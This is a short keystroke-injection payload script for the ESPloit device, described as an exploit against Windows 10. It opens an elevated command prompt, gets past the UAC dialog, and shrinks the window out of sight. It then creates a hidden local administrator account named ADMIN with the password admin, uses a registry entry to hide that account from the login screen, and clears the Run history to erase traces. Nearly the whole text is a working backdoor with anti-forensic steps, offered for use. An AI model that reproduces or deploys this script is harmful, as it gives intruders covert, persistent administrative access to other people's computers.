Exploit to create a new local administrator account ADMIN with the password admin. Hide user from user settings and from login screen.

win10_add_admin.txt

Rem:Generated by Dckuino.js by NURRL
Rem:Modified for use with ESPloit by Corey Harding
Rem:-----
Rem:Start delay
CustomDelay:1000
CustomDelay:300
Press:131+114
CustomDelay:300
Print:powershell Start-Process cmd -Verb runAs
CustomDelay:300
Press:176
CustomDelay:2000
Rem:bypassing security dialog
Press:130+121
CustomDelay:500
Rem:obfuscationg terminal
Print:mode con:cols=18 lines=1
CustomDelay:300
Press:176
Rem:changing color
Print:color 78
CustomDelay:300
Press:176
Rem:adding user usename = ADMIN password is admin
Print:net user /add ADMIN admin
CustomDelay:300
Press:176
Rem:Adding user in administrators group
Print:net localgroup administrators ADMIN /add
CustomDelay:300
Press:176
Rem:Hiding the user via editing registory
Print:REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\"
CustomDelay:300
Press:176
Print:REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v ADMIN /t REG_DWORD /d 0
CustomDelay:300
Press:176
Rem:removing the footprints.
Print:powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"
CustomDelay:300
Press:176
Rem:Safe exiting
Print:exit
CustomDelay:300
Press:176